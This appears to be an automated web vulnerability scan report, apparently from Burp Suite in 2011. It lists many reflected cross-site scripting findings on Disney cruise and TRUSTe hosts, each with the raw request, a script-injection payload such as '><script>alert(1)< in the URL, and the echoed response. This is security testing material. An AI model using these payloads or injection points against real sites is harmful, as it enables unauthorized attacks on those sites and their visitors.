GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:31:47 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:31:47 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=1DD3D030-C717-4860 Cache-Expires: Mon, 16 May 2011 13:31:47 GMT X-UA-COMPATIBLE: IE=EmulateIE7 Content-Length: 7379 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... rrowButton:hover ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:32:45 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:32:45 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=2FC77E24-DC4C-42B8 Cache-Expires: Mon, 16 May 2011 13:32:45 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 7418 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... e-height:23px;height:24px ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:33:42 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:33:42 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB17 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=6F96A674-2F26-47A6 Cache-Expires: Mon, 16 May 2011 13:33:42 GMT Content-Length: 7415 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... chromeExploreButtonS ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att01 Host: choices.truste.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:19:00 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4991 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </script>d96264b56bdd79df<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att01 Host: choices.truste.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:19:00 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4571 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </script>d96264b56bd-anch ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att01 Host: choices.truste.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:19:00 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4512 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </script>d96264b56bd-anch ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att01 Host: choices.truste.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:19:00 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4571 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </script>d96264b56bd-anch ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://choices.truste.com |
Path: | /ca |
GET /ca?pid=mec01&aid=att01 Host: choices.truste.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:19:00 GMT Server: Apache/2.2.14 (Ubuntu) P3P: policyref="http://choices Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Content-Type: text/javascript Content-Length: 4512 if (typeof truste == "undefined" || !truste) { var truste= {}; truste.ca= {}; truste.ca.listeners = {}; truste.img = new Image(1,1); truste.defjsload = false; truste.ca.txl = { 'object' : [{' ...[SNIP]... </script>d96264b56bd_bi)' var tecabaseurl = 'choices.truste.com'; truste.ca.addEvent(window if(!truste.defjsload) { var element = document.createElement( element.src = ' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /media/dcl_v0400/Global |
GET /mediaeae3c"><script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:08 GMT Content-Length: 33412 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /media/dcl_v0400/Site |
GET /media3b6b3"><script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:35:15 GMT Content-Length: 32976 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /reservations/concat/2.39 |
GET /3bc0d"><script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:35:32 GMT Content-Length: 102688 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /reservations/concat/2.39 |
GET /f8e4d"><script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:36:11 GMT Content-Length: 102687 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /services/en_US/htmlQQ Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK X-Cnection: Close Content-Length: 194169 Content-Type: text/javascript; charset=iso-8859-1 Pragma: cache Server: barista/3.3.5 Cache-Control: max-age=1200 Expires: Mon, 16 May 2011 01:44:43 GMT Date: Mon, 16 May 2011 01:24:43 GMT Connection: close /*<script>*/ /* * This module purposely does not bog the client down with null continuous checks due to initial checks. * No client-side JavaScript should be modifying the HTML QQ DOM, unless you wa ...[SNIP]... ange the event function to include a safe zone // for the calendar button image as well 'qqCalendars': Array(), // array of all available calendar objects 'qqElement': 'DisneyQuickQuoteed5b1';alert(1)/ 'qqTravelMinLength': Array(), // array of integers for minimum travel length; ID matches the calendar it // interfaces with, e.g. qqTravelMinL ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /6089a"><script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:22 GMT Content-Length: 102620 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /services30002<script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 156 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.5 Date: Mon, 16 May 2011 01:25:22 GMT Connection: close Vary: Accept-Encoding <HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /services/en_US61d5d<script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 162 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.5 Date: Mon, 16 May 2011 01:25:27 GMT Connection: close Vary: Accept-Encoding <HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /services/en_US/htmlQQb72b1<script>alert(1)< Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 156 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.5 Date: Mon, 16 May 2011 01:25:33 GMT Connection: close Vary: Accept-Encoding <HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /services/en_US/htmlQQ |
GET /services/en_US/htmlQQ Host: dcl.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 156 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.5 Date: Mon, 16 May 2011 01:25:37 GMT Connection: close Vary: Accept-Encoding <HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /concat/4.39.1.5/css |
GET /concatac9cd"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:15 GMT Content-Length: 102613 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /concat/4.39.1.5/css |
GET /concat/4.39.1.59c6ad"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:24 GMT Content-Length: 33368 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /concat/4.39.1.5/css |
GET /concat/4.39.1.5/css1fdd5"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:47 GMT Content-Length: 33368 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /media3ae94"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:08 GMT Content-Length: 102647 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /media1ef40"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:00 GMT Content-Length: 33412 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /mediaa1bc9"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:19 GMT Content-Length: 33404 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /media9295a"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:52 GMT Content-Length: 33403 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /mediaecb43"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:25 GMT Content-Length: 102680 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /mediae44b7"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:24 GMT Content-Length: 102673 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Global |
GET /media2ff92"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:39 GMT Content-Length: 102641 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Site |
GET /mediac9943"><script>alert(1)< Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:56 GMT Content-Length: 102664 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <link rel="canonical" href="http://disneycruise ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /media/dcl_v0400/Site |
